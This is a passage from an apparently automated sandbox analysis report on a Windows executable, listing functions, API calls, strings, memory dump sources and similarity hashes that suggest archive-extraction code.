                          • Instruction ID: 25fc54fe31fcf3dcf45bc2775657cdbdfe517e8b0061cf8b0f759830426fc167
                          • Opcode Fuzzy Hash: a00e5133e0b827736f50e9e913caabb9c5b44b247f86172d97f27391ef8abca7
                          • Instruction Fuzzy Hash: 9CA0029556D3027C710E75517D16D76437CC4C5B513304959F50A944D165845C455531
                          Function 00379EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                          Download Yara Rule
                          APIs
                          • SetEndOfFile.KERNELBASE(?,00379104,?,?,-00001964), ref: 00379EC2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: File
                          • String ID:
                          • API String ID: 749574446-0
                          • Opcode ID: 469e06a39f983a6e0e32b1103652ffde3d427922138c44f4eae844c47dde5cc4
                          • Instruction ID: 4e5f00c90309475bf2ff78d43190d9aaf437a310b2fa3e1232ae78413c977a19
                          • Opcode Fuzzy Hash: 469e06a39f983a6e0e32b1103652ffde3d427922138c44f4eae844c47dde5cc4
                          • Instruction Fuzzy Hash: ABB011B00A000A8A8E022B30CC08828BB28EA2230AB0082A0B003CA0A0CB22C002AA00
                          Function 0038A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          • SetCurrentDirectoryW.KERNELBASE(?,0038A587,C:\Users\user\Desktop,00000000,003B946A,00000006), ref: 0038A326
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CurrentDirectory
                          • String ID:
                          • API String ID: 1611563598-0
                          • Opcode ID: 7c414d3d908cdf93c1b24e15c0a08b1576efeed8b61b4839936e92c9d273db5a
                          • Instruction ID: b604fb91b8388a36f9ef27750247e7e47ff0e4d517a54f71868df6b8a67c0d8e
                          • Opcode Fuzzy Hash: 7c414d3d908cdf93c1b24e15c0a08b1576efeed8b61b4839936e92c9d273db5a
                          • Instruction Fuzzy Hash: 9FA01230194006568A011B30CC09C1576549761702F0086207002C00A0CB308814A501
                          Function 003796D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          • CloseHandle.KERNELBASE(000000FF,?,?,0037968F,?,?,?,?,003A1FA1,000000FF), ref: 003796EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: 9a14de8956223aeae4a929d610040271b97f415481213f3a2c67e5ddfdb508ae
                          • Instruction ID: f75ceccbb7773c108a3ca7a8a9873fc739040886efaac2d7a87f3742186e47b6
                          • Opcode Fuzzy Hash: 9a14de8956223aeae4a929d610040271b97f415481213f3a2c67e5ddfdb508ae
                          • Instruction Fuzzy Hash: 3DF0BE30186B008FDB328A20C548792B7E99B12335F04DB1F90EB038A09768A84D8B00

                          Non-executed Functions

                          Function 0038B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
                            • Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365
                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0038B971
                          • EndDialog.USER32(?,00000006), ref: 0038B984
                          • GetDlgItem.USER32(?,0000006C), ref: 0038B9A0
                          • SetFocus.USER32(00000000), ref: 0038B9A7
                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 0038B9E1
                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0038BA18
                          • FindFirstFileW.KERNEL32(?,?), ref: 0038BA2E
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038BA4C
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0038BA5C
                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0038BA78
                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0038BA94
                          • _swprintf.LIBCMT ref: 0038BAC4
                            • Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D
                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0038BAD7
                          • FindClose.KERNEL32(00000000), ref: 0038BADE
                          • _swprintf.LIBCMT ref: 0038BB37
                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 0038BB4A
                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0038BB67
                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0038BB87
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0038BB97
                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0038BBB1
                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0038BBC9
                          • _swprintf.LIBCMT ref: 0038BBF5
                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0038BC08
                          • _swprintf.LIBCMT ref: 0038BC5C
                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 0038BC6F
                            • Part of subcall function 0038A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0038A662
                            • Part of subcall function 0038A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,003AE600,?,?), ref: 0038A6B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                          • API String ID: 797121971-1840816070
                          • Opcode ID: 9dd10570f610a25e8e346bb3d954daec420d7a4858f048ed5b0501e34767692a
                          • Instruction ID: 7a92da6dfb62551934cd3e2fe6e705a8a090612be2f720dd689fff61016c1355
                          • Opcode Fuzzy Hash: 9dd10570f610a25e8e346bb3d954daec420d7a4858f048ed5b0501e34767692a
                          • Instruction Fuzzy Hash: 259184B2148349BFD632ABA0DC49FFBB7ACEB4A700F044819F749D6091D775A6058B72
                          Function 0037718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 00377191
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 003772F1
                          • CloseHandle.KERNEL32(00000000), ref: 00377301
                            • Part of subcall function 00377BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00377C04
                            • Part of subcall function 00377BF5: GetLastError.KERNEL32 ref: 00377C4A
                            • Part of subcall function 00377BF5: CloseHandle.KERNEL32(?), ref: 00377C59
                          • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0037730C
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0037741A
                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00377446
                          • CloseHandle.KERNEL32(?), ref: 00377457
                          • GetLastError.KERNEL32 ref: 00377467
                          • RemoveDirectoryW.KERNEL32(?), ref: 003774B3
                          • DeleteFileW.KERNEL32(?), ref: 003774DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                          • API String ID: 3935142422-3508440684
                          • Opcode ID: a7eb47e209227a6320130b9f8ff595a8ee1511e9dbcdd51fbed01e5bd0d1d064
                          • Instruction ID: aa86d1d8c3ea19b3bddf301b9f6a4dc4f2400268725c7727464df52deba96182
                          • Opcode Fuzzy Hash: a7eb47e209227a6320130b9f8ff595a8ee1511e9dbcdd51fbed01e5bd0d1d064
                          • Instruction Fuzzy Hash: B0B1E571904215ABDF32DFA4DC45BEE77B8EF05300F0085A9F949EB152D738AA49CB61
                          Function 00373281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prolog_memcmp
                          • String ID: CMT$h%u$hc%u
                          • API String ID: 3004599000-3282847064
                          • Opcode ID: 9e4a1d2903cf54d40967efb66d2e9e5c20dfb66012688c43ebc56781860f044d
                          • Instruction ID: 4cb2d8cfc6a73533202204e21ead47c171a03e9146b08c1949dff17a648f621c
                          • Opcode Fuzzy Hash: 9e4a1d2903cf54d40967efb66d2e9e5c20dfb66012688c43ebc56781860f044d
                          • Instruction Fuzzy Hash: 3A32B6715102849FDF26DF34C896AEA37A5AF15300F05847DFD8E8F282DB789A48DB61
                          Function 0039D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: __floor_pentium4
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 4168288129-2761157908
                          • Opcode ID: 2611b449cf4108e4448fb0a52f67fa9198574ea5865a0c836c05b2845b654523
                          • Instruction ID: c3bf1be023dc59fff2919b6f70d32a6150cabfdd8236e293436a1d61235c2432
                          • Opcode Fuzzy Hash: 2611b449cf4108e4448fb0a52f67fa9198574ea5865a0c836c05b2845b654523
                          • Instruction Fuzzy Hash: 21C23972E086288FDF26DE28DD417EAB7B9EB44305F1545EAD44EE7240E774AE818F40
                          Function 003727E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 003727F1
                          • _strlen.LIBCMT ref: 00372D7F
                            • Part of subcall function 0038137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0037B652,00000000,?,?,?,0001045C), ref: 00381396
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00372EE0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                          • String ID: CMT
                          • API String ID: 1706572503-2756464174
                          • Opcode ID: d9453dd47ac15aba3e70a7c0012674d0e44e47fcd44fa92755fa85a56f8fa224
                          • Instruction ID: d4bf5a26ad75b4eeafb6f387a74e0a74b3bd9bd78a414cdc1f0c942822f5ee57
                          • Opcode Fuzzy Hash: d9453dd47ac15aba3e70a7c0012674d0e44e47fcd44fa92755fa85a56f8fa224
                          • Instruction Fuzzy Hash: D762F2715102448FDF3ADF24C8856EA3BE1AF59300F09857DED9E8F282DB79A945CB50
                          Function 0039866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00398767
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00398771
                          • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0039877E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: b5efb41387f195808edda75125ea004756aa2b02bd36e086e4941e46ba0f9dc7
                          • Instruction ID: eab6cd992c591ca5d0cfa8594c2a2e3cbfc8e7f05ea2951368d9449f365fc75b
                          • Opcode Fuzzy Hash: b5efb41387f195808edda75125ea004756aa2b02bd36e086e4941e46ba0f9dc7
                          • Instruction Fuzzy Hash: B031C6759013289BCB22EF64D889B9CB7B8BF49310F5041EAF90CA7251EB749F858F45
                          Function 0039CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                          • Instruction ID: 7eff451a8ebea924f0e37617e573f631e9dd0af2705e28fac84c0ef4c51f1db0
                          • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                          • Instruction Fuzzy Hash: E7021C71E102199BDF15CFA9C8806AEBBF5FF48314F25416AE919EB384D731AD41CB90
                          Function 0038A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0038A662
                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,003AE600,?,?), ref: 0038A6B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: FormatInfoLocaleNumber
                          • String ID:
                          • API String ID: 2169056816-0
                          • Opcode ID: d4b6693f047e635046ba02cf41f796e6ad02653512549a70641ef16f1b9cd6b8
                          • Instruction ID: f94c9d73743afcdf363d6b72219dad19575eee5875e3874dcc1e45c1ca0c6f8c
                          • Opcode Fuzzy Hash: d4b6693f047e635046ba02cf41f796e6ad02653512549a70641ef16f1b9cd6b8
                          • Instruction Fuzzy Hash: 67017136140308BFD7129F64DC45F9B77BCEF1A710F008822FA04D7160D3709A158BA5
                          Function 00376EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(0038117C,?,00000200), ref: 00376EC9
                          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00376EEA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ErrorFormatLastMessage
                          • String ID:
                          • API String ID: 3479602957-0
                          • Opcode ID: c87c2447e643ea34951d9511c842d428f7f944040557fa3292a7a11743d68d1e
                          • Instruction ID: 72a71d77f0d2c305326165055532777101d658e4bf7c8a2fe827bc5bdca2898f
                          • Opcode Fuzzy Hash: c87c2447e643ea34951d9511c842d428f7f944040557fa3292a7a11743d68d1e
                          • Instruction Fuzzy Hash: B6D0C7353C4302FFEA624A74CD06FA77B5C6757B82F10D514B357E98D0C57090149625
                          Function 003A1194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003A118F,?,?,00000008,?,?,003A0E2F,00000000), ref: 003A13C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: 417e9279a840aef245c69decec6b3f0fad81305ffbf7aef908e895633383a3e6
                          • Instruction ID: a20aad904d8f637b17429735e8fd9143743e9c7137f05142c42c98f79a0b65cb
                          • Opcode Fuzzy Hash: 417e9279a840aef245c69decec6b3f0fad81305ffbf7aef908e895633383a3e6
                          • Instruction Fuzzy Hash: 0DB14E356106089FDB16CF2CC48AB657BE0FF4A364F268658E999CF2E1C335E991CB40
                          Function 0037407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID:
                          • String ID: gj
                          • API String ID: 0-4203073231
                          • Opcode ID: ae96587005b351a267143465a34a61cafcd7394a9727369badced0339bb10fb4
                          • Instruction ID: 7380bcd0a5300b4ceaef93f7478d70b284cd370a15b0cdf3ae8e03e602a9e1cd
                          • Opcode Fuzzy Hash: ae96587005b351a267143465a34a61cafcd7394a9727369badced0339bb10fb4
                          • Instruction Fuzzy Hash: BAF1C2B1A083418FC748CF29D890A1AFBE1BFC8308F15892EF598D7751E734E9558B56
                          Function 0037ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 0037AD1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: 59078fb5d6f4969763084dd2a402858e57748c9f0b2b1ff0741a6e2979b581a2
                          • Instruction ID: b7c7b225152954e36ecce005a186217ed1ad208032419edd6b9588e043af3968
                          • Opcode Fuzzy Hash: 59078fb5d6f4969763084dd2a402858e57748c9f0b2b1ff0741a6e2979b581a2
                          • Instruction Fuzzy Hash: BCF01DB0E0060C8BC73ADF18EC516EE73B9F799715F204295DA1943754D374AD40CE61
                          Function 0038F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0038EAC5), ref: 0038F068
                          Memory Dump Source
